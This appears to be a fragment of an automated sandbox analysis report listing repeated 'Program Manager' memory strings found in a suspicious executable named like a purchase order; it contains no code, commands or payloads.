                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXa
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXl
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8J
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXi
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxu
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxs
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXS
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXO
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxn
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXZ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXY
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXW
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q87
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q86
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxv
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|)
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|'
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8c
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qz
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8a
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8_
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX~
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8m
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8U
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qj
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qq
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qo
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8\
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8Z
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXx
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8X
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qv
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\-
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|7
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|5
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8p
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8o
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|>
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q=
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q:
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qA
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qE
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4(
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qth
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtg
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qte
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qF
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtP
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtO
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT7
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT6
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtU
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtS
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4A
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT^
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT\
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtz
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qc
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtq
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTQ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtl
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qty
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTY
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q49
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qR
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtu
